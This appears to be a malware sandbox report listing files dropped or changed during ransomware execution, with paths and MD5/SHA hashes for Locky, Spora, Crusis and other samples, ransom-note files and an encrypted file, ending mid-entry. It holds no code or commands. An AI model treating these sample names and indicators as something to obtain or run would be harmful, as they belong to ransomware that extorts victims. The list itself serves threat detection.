                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          cb89b3f86b25dd4add48d296973a04e0

                                          SHA1

                                          c0d9481ad82ba36fd7e6b3ae60b72febf1df6376

                                          SHA256

                                          28cc8bfda67eff25531be2d76dc69782a4041127b8c6d2db38a0ca0ba12f5535

                                          SHA512

                                          e00ff39338ebaf7e6b8c7392c5357a4a46bd731974888d0608cdcc1d4fa66d758514d70491302966bd28c860764ebb87e04c8a38eb7bb45c03f4a7fcd82cac1b

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          5f08e5bc6ba397c524ea93b706f4d026

                                          SHA1

                                          41a5732ab7497ae227b49981c3a6ebd03d1a8131

                                          SHA256

                                          da5695f72b0ca598be30907af33361ed5835fcdc3a1bbaeb343530b73acc7f02

                                          SHA512

                                          05bea33a9636a5cfd23f4452e4436b095c9a2e245755888876e03ad5eba6e3f1c826bea4d0fd30f9113310486570e563e614db0f7ad6dd4f5497b7a42800f241

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          350776ce9ebd51104d04b776dbf5f894

                                          SHA1

                                          51e27960bc59fcfc25ffaf725181de5d60bbffb3

                                          SHA256

                                          91da2413000b2fa1fc61109f87ff4d4ed616ee28d406dcf8511ac05cc2a017ff

                                          SHA512

                                          9d298c066baffc84763278d6db4fd3e1fdd8e2c5fe4c00bc0b03b19d4c63d370d6633b104cd35a1849972649ba1b5cbab667e7e3638e9727739c5eb51be890b5

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          211938e38e16b9d734a6d26fb769ed54

                                          SHA1

                                          28872ed59ccc7416a9b1d65be65746e5254f155e

                                          SHA256

                                          85894975f001a4821822462f2e359e630f2e133ac1edc8c88ac44d10f593698c

                                          SHA512

                                          ac4dea28c19eeb118431925af774e8cf057d97588b9c93a9b27596169e1893dcab111029192f7a2ec0f754bd04a6bff28b262f449a98c9dfb393aadd9d35dbc2

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          28d6148ca01e53cf02ae8db88b4c1623

                                          SHA1

                                          355bc45cf790e5ab9b55928778d41008523f3a48

                                          SHA256

                                          520722e9bb8b8dc0e21559a5b04c4fcc9c062ad64e0cf8e384f34c682f0e1d5a

                                          SHA512

                                          cd07d1d1d157d3a67ec69ca2d34bc01f1968afde7ad0ac3968f2816a9461554003291bae69110c9dc7741f11a8ffba213e9c4149bdc03ec0a2ef4cc5a3cce040

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          abf65e9774eab43d36b42873a810b6d8

                                          SHA1

                                          7fc4bfa765cb710a90e160ea1b73a6d65bb448c5

                                          SHA256

                                          fd58384f804e27689e12e4774ff845e10e6be0fe2787c1f7d024ecaae4cb33c8

                                          SHA512

                                          553d3a9914f9b1bc8c11e6264f28ef25779c8f8ef5d23f1e4bdc53db7f8ec609154f604d199b41014785c30127070df4c949fb8da631460e0ad1fb212a68e7e5

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          455e5211cb33d97d71d5b69dfbff524e

                                          SHA1

                                          1d3ff41070e22ee77581e8b88635c48ef287507b

                                          SHA256

                                          7619df0e71347d67e713b5c94dc97ee729cd0e6933d2ae4da4c78cdb49ee6293

                                          SHA512

                                          732638e6772a7517e084f059540b6fa9e633ee8ef56213ef865d32f07a07892d2a394c3e6c0188e614c81566e3a8ec92e3f31e2607c328c58c5b7c871801a899

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          776f9744fbc697dff678e92dbbea7b17

                                          SHA1

                                          ddad92681a61b558cb79c5d287fd2925e875334c

                                          SHA256

                                          36c8f36762abb0a62c21b5ec4a6945c32f6eb979fb00c35be887b7bbc50990bb

                                          SHA512

                                          01dcec548dbcfb82a6754c6e3a52dfd239fa602691527021aa5978a8a34abab3d1c16421265393063eab42746aea3e38088ef0b056a8977d847172ad3cded145

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          a2ecf09569c0b0b88a9ff89913f0e4c1

                                          SHA1

                                          eaeead050f6ca3731ba1e4fce37c2513762491c2

                                          SHA256

                                          4e49df585246b8d1dd42ecd62a451dbe72f89c9889d345a53723576ff51986f2

                                          SHA512

                                          cc92dbb5ff2f2fcb1b34218b88101e5f4cdf38858b165bb194092d7325e841c786dfa93abc3bf2b787c7dcca2ad0759e787df08830e18e2499a720efd5e0aacd

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          6ac7de19654b70c405ff402c1683f133

                                          SHA1

                                          4b8fd9ab07c825880e7faf9ab523e4a43dc5f619

                                          SHA256

                                          f6d05db56bde8ba0487e62b5da8389d641809098c1f94b4b4e545b7580fdfdad

                                          SHA512

                                          b5f76ad7a1d46e8dc379d9f85ade88e9c5e6344c7d82e168f38a569c9e989bf1b198cd4527c58cf77b8a2a6ab99ddfe8a01fbde7134a33d027676e7577bcf976

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          46d01e9c1b66e806f5b11cd340c46b7b

                                          SHA1

                                          213b214f272dec2e4ee3dfc5cc7a5a010e2ff4fa

                                          SHA256

                                          ad89bee7b892b889cb1b658d61ac11b5ba083631f43589632a20c7924fb41d56

                                          SHA512

                                          fc13a5bc49b7ed1a7f487ce2cd3f07686f6d07dcfc6648d0c1c08070e1adfa050c8f10942ae11f1b56caa06132bea81fd3534f2e1c914d061a450d87b623fbf4

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          41f46e4165d984993479247aacbd149e

                                          SHA1

                                          ddbdb2c8a91fd6eacdb9404e84b24530829d8a7c

                                          SHA256

                                          634abceaadbef05cbf15de8b3215013ff7d9d8713bee6a8325f3de17446a7981

                                          SHA512

                                          4d0699fe9563d090542206387351d72fc089f1949ba1d68e413138b148048cce11b51dd77ac5afe8afca63dfbb06c2972707caf9bbd2d5311492462023ca9e3e

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          341b2bf7a65ddf6dc649c901d35a10e1

                                          SHA1

                                          05613c0be5cac2168b352fd1210fdf4d79604503

                                          SHA256

                                          c544e585d5571cf9ed0d877e2c663a76a83ca94d741217ec3397be1b0536d541

                                          SHA512

                                          7a00770dac467e1110fa1f25ffbb4ee27eefc460d566f601d5ce070dafd31091070004321ad9006b8e860d52e0cfa6a35e5c053fd4f079ae75173b530e7e0771

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          ea529d3c6b0d3968077519ddcaaa199e

                                          SHA1

                                          2cc78032e999bc66830abe1c92d6731c9d3b9b2b

                                          SHA256

                                          aeea870328374ee71276114a5bbef5d9197e1fe63a400086a11c648762a8274f

                                          SHA512

                                          677d4366b4454bac378b7fc715416fb9c07979302fe68bdbbfb39db22086248420192b5787656ff10e79fc9067d79c6446a2b6a6e64480c30583f57f09ccb3a0

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                                          Filesize

                                          242B

                                          MD5

                                          81e2c5da8403d939600fae6b1acbfaf4

                                          SHA1

                                          a8c27bf01102a45631e5ae2d88ddfcdb7927e99e

                                          SHA256

                                          936120c0e5105e5301ee884ae28b0cfe32d8abb87a352c23256ff67abe420820

                                          SHA512

                                          197eeb9640d53884f744ad1eecdbca6249452e4db7a0123ce4fa69a0aec2631a0542d7acf0ee30e82c447a21a79622fd8b39d8853754a9121e89d3ff58b5a6b3

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

                                          Filesize

                                          4KB

                                          MD5

                                          da597791be3b6e732f0bc8b20e38ee62

                                          SHA1

                                          1125c45d285c360542027d7554a5c442288974de

                                          SHA256

                                          5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

                                          SHA512

                                          d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\favicon[1].ico

                                          Filesize

                                          1KB

                                          MD5

                                          2b3e613b93b186378124254e4d777922

                                          SHA1

                                          06d062157f32d1fb6870bf42c1ca36711c33850f

                                          SHA256

                                          b7ca994f59312458a99a07e33a05dfdd120fdecb0e45ba2e55d723df872a72e6

                                          SHA512

                                          139c60b0722750173750ef89f79a5c67332f5503942c92199cfed883ebad5f9293bdf8120f94cc523f94e8e09ba8e94c9a62675cc5f678eed6b385da5f1dd674

                                        • C:\Users\Admin\AppData\Local\Temp\259537116.bat

                                          Filesize

                                          94B

                                          MD5

                                          3880eeb1c736d853eb13b44898b718ab

                                          SHA1

                                          4eec9d50360cd815211e3c4e6bdd08271b6ec8e6

                                          SHA256

                                          936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7

                                          SHA512

                                          3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b

                                        • C:\Users\Admin\AppData\Local\Temp\6B12\31.bat

                                          Filesize

                                          112B

                                          MD5

                                          19267a7a78346e5fb95e72fbaf0dfcd3

                                          SHA1

                                          353f7ac9a79bbc5fe8d44e2664779bcbc77365c2

                                          SHA256

                                          bebe5ccdc599d3b475a83b5f2b6a58d49eba914b1c1478c4e634ce647f2cc0bc

                                          SHA512

                                          5aa361cf2511406be32d98ab0ebd8f23aed67c667c43d2aeaae8ad979e9da24a99de7baf77710e050052c431b8743ed68ea8fe2b944eb36cf96ce3346a1561c3

                                        • C:\Users\Admin\AppData\Local\Temp\CabE937.tmp

                                          Filesize

                                          70KB

                                          MD5

                                          49aebf8cbd62d92ac215b2923fb1b9f5

                                          SHA1

                                          1723be06719828dda65ad804298d0431f6aff976

                                          SHA256

                                          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                          SHA512

                                          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                        • C:\Users\Admin\AppData\Local\Temp\Stp8C0A_TMP.EXE

                                          Filesize

                                          1.5MB

                                          MD5

                                          a3d2c44e50a06641c9c4a73462f5b388

                                          SHA1

                                          243f97685ebb9233628564fb42f6d942f5b39075

                                          SHA256

                                          a5eb7bda54a22ca61b27f17450d68e046a67662e9c5648ec4a846231f706c101

                                          SHA512

                                          d7f3f0892f8d6fd4b598e81bda8985188cabd9226b5d65886e22f59e9a89a7ea936fd8558c88068f1323a33547d548b1fb21f2b9ec9b48f0f84e22f9eea41ddb

                                        • C:\Users\Admin\AppData\Local\Temp\TarF2DB.tmp

                                          Filesize

                                          181KB

                                          MD5

                                          4ea6026cf93ec6338144661bf1202cd1

                                          SHA1

                                          a1dec9044f750ad887935a01430bf49322fbdcb7

                                          SHA256

                                          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                          SHA512

                                          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                        • C:\Users\Admin\AppData\Local\Temp\is-CHLB0.tmp\Stp8C0A_TMP.tmp

                                          Filesize

                                          697KB

                                          MD5

                                          832dab307e54aa08f4b6cdd9b9720361

                                          SHA1

                                          ebd007fb7482040ecf34339e4bf917209c1018df

                                          SHA256

                                          cc783a04ccbca4edd06564f8ec88fe5a15f1e3bb26cec7de5e090313520d98f3

                                          SHA512

                                          358d43522fd460eb1511708e4df22ea454a95e5bc3c4841931027b5fa3fb1dda05d496d8ad0a8b9279b99e6be74220fe243db8f08ef49845e9fb35c350ef4b49

                                        • C:\Users\Admin\AppData\Local\Temp\tmpBCCA.tmp.bat

                                          Filesize

                                          445B

                                          MD5

                                          32d8f7a3d0c796cee45f64b63c1cca38

                                          SHA1

                                          d58466430a2bba8641bd92c880557379e25b140c

                                          SHA256

                                          1a6f73b5c28d1c10f63f2056068c1de61487b8cf8f1dcf7516548df144b3e9ea

                                          SHA512

                                          288213b92a03ac750ea319bb23c52e7bdf47f5a47ecb70c905c7610a84c63a3ec0a30801b5880e6def8df2c9f577082072e342198d23a19f64e561923e1ef698

                                        • C:\Users\Admin\AppData\Local\Temp\tmp_e291d4ef.bat

                                          Filesize

                                          364B

                                          MD5

                                          6f5b5cdeef2633a07f20ba5998d50103

                                          SHA1

                                          3a79b76b4ec6457f8bb8e7000c0be347421400bd

                                          SHA256

                                          5c168e5ae80c330a335cad8f052229f5ff9a9cba98cdd333d7cf682a24964839

                                          SHA512

                                          bfb41d8142461d2dfbeffc3bca71ffb2c9103e41270d20c14b2847ba540887838eddb724ee32b63168c8d863c39afbd9fe7cb360c2a2bc2a6975dba383c01765

                                        • C:\Users\Admin\AppData\Roaming\USDCE-40FZT-XTXTX-HTRAT-FYYYY.html

                                          Filesize

                                          16KB

                                          MD5

                                          0237400377cc107105d5c6a9a4027da1

                                          SHA1

                                          994f4ae12ff5fffa36fee0fc2af745471084e16f

                                          SHA256

                                          07b4d2cac3182519686197984fc60edecf80c61218716625c35a95f500584e8b

                                          SHA512

                                          19cb8c580892e1f8ecf5e9beb7ef7cc188749ebe598eb5e2fc48a472488418a37666c3c6ab07eaae598adc36e0198fdea0aabef4e6316362531b8b3051271ef9

                                        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Foreign.gen-877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778.exe

                                          Filesize

                                          646KB

                                          MD5

                                          0653b2f47ac314b85efe3dc7ac13b551

                                          SHA1

                                          2e1b9bae3a808589a22479d953db9d912bf3cebe

                                          SHA256

                                          877026bab25fbb0b7f48ef930be29491aff73302d0fab551f049dbcffacf0778

                                          SHA512

                                          feeb9f0d4c9298a9c46f81c5b3d7ae49ff6c90852f11f505afc0e1ef355253406875f44e4bb336c656607c4ab447bea9a6b39d68586ed92df3d587169ef5482c

                                        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14.exe

                                          Filesize

                                          184KB

                                          MD5

                                          8dc0ee0a3a92831175d4fe9d8de7d1c3

                                          SHA1

                                          e872cf2d58bc82ad87268bc0f46b35b9ed8899eb

                                          SHA256

                                          3a2e28abe439fb6eecf3cd7d5dda3704f0b00955e3a0f685c6905a8ad30d5f14

                                          SHA512

                                          f0845bea2ce24c9f69c36a899bf15334c975c6852abf3749e29d89f06e6e2824c3662019d2a3b48d5b254803a7b8a6c8a83d5d43372050750c13f2b6fe38f989

                                        • C:\Users\Admin\Desktop\00305\HEUR-Trojan-Ransom.Win32.Generic-5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f.exe

                                          Filesize

                                          134KB

                                          MD5

                                          c57cffc0dacdd4c2f840b3e653cbd231

                                          SHA1

                                          fd1f2ad4179a411753351854f47d6979629f7277

                                          SHA256

                                          5aa256189ce393c8845b7edb791307b41f30a8d1f7024b61ccd8ee7b68a9445f

                                          SHA512

                                          f103e4ca65a9c815d5ca0bfd75ea5f789bca1d4b0d92d5deb0652a9369b455807945797a2d89257de8a7bea1ec3024f94106184563ab76795d3fdbe2bd4db536

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.MSIL.Phny.m-ad1d99b1a9adefa31d10f199f6327ce7325ef391504f0413773a0ac58fece46f.exe

                                          Filesize

                                          124KB

                                          MD5

                                          3488f6fa6f525585cdfb05b109668ba3

                                          SHA1

                                          07ae6f519bc7a3c78fa39ff5aadcc8fb138d42be

                                          SHA256

                                          ad1d99b1a9adefa31d10f199f6327ce7325ef391504f0413773a0ac58fece46f

                                          SHA512

                                          c9f410a8402159ee9c8672235d61ec02d0c7372bc42f41bcd60661f0ec1c57fbe8cb2687eb52b4ec9238df6cbd40fbda0d2884ae035147a7f67e67a2356377e9

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.klsk-6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6.exe

                                          Filesize

                                          928KB

                                          MD5

                                          cb4797412b72636ca0d8a471f8fcee01

                                          SHA1

                                          c30d226a024b5f6a09af71467a540564ab7b7fe7

                                          SHA256

                                          6cd68f13d54745edcdc5e0ee4101a5b5d0adc1773c547d021370c9818d366fd6

                                          SHA512

                                          d7999acecf5d594ac7ad294ded6c61e7e20bf9db4371e9fbbe20d97a000d2216c0b2a8c5655af214909c7203fc35b0e0956b9082778c75deaf7c345beef6e3de

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.kmye-ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a.exe

                                          Filesize

                                          168KB

                                          MD5

                                          631e43e816fb50e5cd51150fdae5e44c

                                          SHA1

                                          994a7e19b53eef2b017f7a7c64e84e4ce69e24bb

                                          SHA256

                                          ce5bb3a98822c116832d80c75a9b639fe55b01c533a3b132ceaefb7eb632a67a

                                          SHA512

                                          2550bc0bb3647cb547b25d9ecdcbce4b7c30872abba2a8decc778751fbcead50ac492019f794f5d0a16fd2ad09b6dd3a7b57d5ade7d6b27e18b52e36e8b16f38

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.meia-8e4fd1b159fa4ba82abf469335fe217506670d0983d067d0733351d7c42130fe.exe

                                          Filesize

                                          63KB

                                          MD5

                                          527388bf300a1a4fdd2c4707c78e0663

                                          SHA1

                                          e215e0b85aa2e81300619a5b7cb992be07993d40

                                          SHA256

                                          8e4fd1b159fa4ba82abf469335fe217506670d0983d067d0733351d7c42130fe

                                          SHA512

                                          c11ba345969cb99b899810401c679d39282365af8eeeaf792c214d0eb915d4bcbdc5f058aea096f3d062d320beba3913752b9cb638024c1789fdb8e249ed68cf

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Crusis.to-9a4e83046bf3eeb98e269c51654e5c31b1d353ff9b7af4d0f6dab4d8aaadaf01.exe

                                          Filesize

                                          92KB

                                          MD5

                                          1592dbf4ad00b039cb280f1d95c7cc80

                                          SHA1

                                          647135c9ee7a8df55ab69c8ee55766bc326a4720

                                          SHA256

                                          9a4e83046bf3eeb98e269c51654e5c31b1d353ff9b7af4d0f6dab4d8aaadaf01

                                          SHA512

                                          8e9176c6d8d55f3b39d4f8ea9654471b021df4e9e5ede043cd5d76cba6514b78af94ce9070f6e337a63431d26e3f8514f860cc8fa054b3d424ac9889acc3328f

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Crypmod.yst-25753eae209d8552a8a43cbf9f796798409db5271527086794c1428ff4a384e6.exe

                                          Filesize

                                          617KB

                                          MD5

                                          ffba97b94680f3cb410209b8517366f4

                                          SHA1

                                          c2e56733f0771e95e0bc1272303c516d934f509a

                                          SHA256

                                          25753eae209d8552a8a43cbf9f796798409db5271527086794c1428ff4a384e6

                                          SHA512

                                          45f04a78fd7ab97cb7fdcf291315913fa4362c8f9fb37df1ee98c1061339f0c18d450e11e14d065065ed6cd8b8e346e9d5cb69288a8fa188b2f58a6a4e637bd8

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Foreign.nwbs-18e67c83ac62ee830568249b34d59e49d85a5847ea41caa332db53ace30c8d78.exe

                                          Filesize

                                          911KB

                                          MD5

                                          4b4a037512c123d3d3c043d65bf74d0c

                                          SHA1

                                          a768ccf2c8830b8e74095ea5397efacddfce8a30

                                          SHA256

                                          18e67c83ac62ee830568249b34d59e49d85a5847ea41caa332db53ace30c8d78

                                          SHA512

                                          907b5e004884643fd4c5b674965f7b770cbdb8cbf6c6ba56e32cfacc67614f731868e0e1b98a661164ab9dc6d1ed7064d9d7287e29df21c37ee8ffc4f65685a5

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Foreign.nwcz-a7c3f44433ee74b7e79973b627a33425e5d88b3860a737a7530b5db51a16dadd.exe

                                          Filesize

                                          598KB

                                          MD5

                                          10078f3c56cdcdf55104e586169fad89

                                          SHA1

                                          359d5a67eda02b9e004b637564e3d500617b3ef5

                                          SHA256

                                          a7c3f44433ee74b7e79973b627a33425e5d88b3860a737a7530b5db51a16dadd

                                          SHA512

                                          84c8eb8ab607ef06fde0d9ba73056f3f1047a397966c428e48935c595e17eef4a99b9504cb736c8591bce2c094e6658f615d35b3269d11d4c727ec4a0de9a308

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Locky.a-1a7587dea4824ef2d6b3cf623493cb2dfd17f534458c55521c6ada2d4a70cfee.exe

                                          Filesize

                                          95KB

                                          MD5

                                          e5a5cd682c17a0799a282a0e518a794a

                                          SHA1

                                          e9f7d3d9e727a4e59ea16e3da3d8eb942afafa30

                                          SHA256

                                          1a7587dea4824ef2d6b3cf623493cb2dfd17f534458c55521c6ada2d4a70cfee

                                          SHA512

                                          fb91d4e33b99ff8a1dde41309209e699ffbe3a3d945e10c1c0c23d4d09e5e6273f7845e6365bb0553923059964671393a84c1862c02bb5499a56bb18f6295db4

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Locky.addj-0a3b93e2d8c5a496b35c882a6c6529d1b36099da7096610fbde6c2d72a266544.exe

                                          Filesize

                                          192KB

                                          MD5

                                          55b8fc2372cebd180c29e94025365cd8

                                          SHA1

                                          3060ab162265b4f0930a90aa9f67a9bc0eee90f8

                                          SHA256

                                          0a3b93e2d8c5a496b35c882a6c6529d1b36099da7096610fbde6c2d72a266544

                                          SHA512

                                          f83fdc84c9a745af25a9932247507917f02928d12f928db159d5c74bd20f894592be2569fca83a6f238b880e2755e4d8d65c4072b60980236bf8c61099516f9c

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe

                                          Filesize

                                          192KB

                                          MD5

                                          d0f079e8cd491c95d563af18ec87684b

                                          SHA1

                                          3cdf734acc7077f1c7f0b454ac1ea472543394cb

                                          SHA256

                                          8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777

                                          SHA512

                                          33c9032f4677c7b66433d1504d769fd308fbb54cc31b127821d40eff98228f5cc4afa0636d1454c92926ceb5450e0d61b414f404999951dada3f37384334b215

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.afn-789a25139cfffaf8c6ae3cd914c0df394e8bb252d39ede7783f406310a7ed98d.exe

                                          Filesize

                                          197KB

                                          MD5

                                          c8ce1a1476097ee9cbf241eec37ae88c

                                          SHA1

                                          108ba5aefdc0a4d11e6a4c1d0c8bee3ac82dac99

                                          SHA256

                                          789a25139cfffaf8c6ae3cd914c0df394e8bb252d39ede7783f406310a7ed98d

                                          SHA512

                                          1c233ea8fec83b19dad42b05c215240976d85affa40941911f23e6563624d03401775c356b308e0d97e3d250718e9b08fc6c073a3d183ef5280f1a05fd128275

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.SageCrypt.dxm-1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb.exe

                                          Filesize

                                          308KB

                                          MD5

                                          07bd56f613488a53f6038d50648f9eee

                                          SHA1

                                          ae9da4616f08bc5b2ffefb45a82bacd622b5736a

                                          SHA256

                                          1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb

                                          SHA512

                                          57ba8a05c4dbff84feb2ae99967d465fb0864d8efbcb048409c96138e92878f360b2addc2e9a717c354c0ac2bc7c18113038c41c927ef17513451326a3759dae

                                        • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Spora.fqp-f4d03d9a317d344b3820b9c8a92ea0b70fb4a102f7769d8f0d70137728a02716.exe

                                          Filesize

                                          108KB

                                          MD5

                                          d7ae8a589609ee98089ff1c87c58b62b

                                          SHA1

                                          2db281797bf47d6073d4a0a8dbc9071a595aeb71

                                          SHA256

                                          f4d03d9a317d344b3820b9c8a92ea0b70fb4a102f7769d8f0d70137728a02716

                                          SHA512

                                          4b3a284219026df930b9722141b2e6f0a36f4f9eb76c44ac1a236e232f6e4c5f56bde56dd2ad99e2b6693087629f119ccccf2c76bded8e3219bb5af861c8082c

                                        • C:\Users\Admin\Pictures\!HELP_SOS.hta

                                          Filesize

                                          64KB

                                          MD5

                                          2c6c918f6f2e01a171d3ebde4f8f2836

                                          SHA1

                                          1488103fe48265819f60792dababfafa3d3a81b1

                                          SHA256

                                          fe431a0a6c7484e3db4cd48b5b169de873e7d2171cb92bcb60a0406d8259f6ca

                                          SHA512

                                          2fe09984279e2122464bd5fdc4c4db8c740dcd19672430d47a7a42767e72c147eec842f2c57a3fdc1ef68802a6cae604687ffe2fe8fe9fce1dba6f83444b987b

                                        • C:\Users\Public\Videos\Read___ME.html

                                          Filesize

                                          4KB

                                          MD5

                                          a616f2a3eb4c952c78df5d1b493f1007

                                          SHA1

                                          562bf8ecf1a77771d5ce4e5c5dd30ef4c38736fd

                                          SHA256

                                          6dc7bf4309b70dc6d6c1dcf0d032d0ea1256f16caf4bdabe54d0905292a4e068

                                          SHA512

                                          e58859e398cd3d1d58b87afe76eaea2feee32b5659e0d9a1c645c9383b43175e094b29b691e6b07f00e8f58f5924b8e132de67f43f71121e3dd63b5c40525fed

                                        • F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini

                                          Filesize

                                          129B

                                          MD5

                                          a526b9e7c716b3489d8cc062fbce4005

                                          SHA1

                                          2df502a944ff721241be20a9e449d2acd07e0312

                                          SHA256

                                          e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                          SHA512

                                          d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                        • F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini.id-1B6BAB44.[[email protected]].arena

                                          Filesize

                                          1KB

                                          MD5

                                          1f51c7ca944b1d6e5423a22c765b5930

                                          SHA1

                                          1317da520e5ea0f5aadf39fbe3d75fb97eb1ff05

                                          SHA256

                                          297b07364554ddd29911ae86f4df49901f1754b350a5aa66fd1e8dbdc7c1b672

                                          SHA512

                                          4c8354857dd5a3f5081413cc938078d57090241654cacb88b7b54dece09ce0be43140c2ab9cf3856cece31d0e0cf979d23dbe5bf45da7605d63d6dbd0097d095

                                        • \??\PIPE\srvsvc

                                          MD5

                                          d41d8cd98f00b204e9800998ecf8427e

                                          SHA1

                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                          SHA256

                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                          SHA512

                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                        • \Users\Admin\AppData\Local\Temp\nst8E8B.tmp\System.dll

                                          Filesize

                                          11KB

                                          MD5

                                          3f176d1ee13b0d7d6bd92e1c7a0b9bae

                                          SHA1

                                          fe582246792774c2c9dd15639ffa0aca90d6fd0b

                                          SHA256

                                          fa4ab1d6f79fd677433a31ada7806373a789d34328da46ccb0449bbf347bd73e

                                          SHA512

                                          0a69124819b7568d0dea4e9e85ce8fe61c7ba697c934e3a95e2dcfb9f252b1d9da7faf8774b6e8efd614885507acc94987733eba09a2f5e7098b774dfc8524b6

                                        • \Users\Admin\AppData\Roaming\Ziyhna\wiikv.exe

                                          Filesize

                                          67KB

                                          MD5

                                          4282263514d10c66285fe5b1c0cfd8fa

                                          SHA1

                                          4ac2efae74506437d826b73e233f7290e707ce48

                                          SHA256

                                          22c01b00ce567279ce36879a75f0e11f30a8d36d599cbb6c5a5b1da710ad2765

                                          SHA512

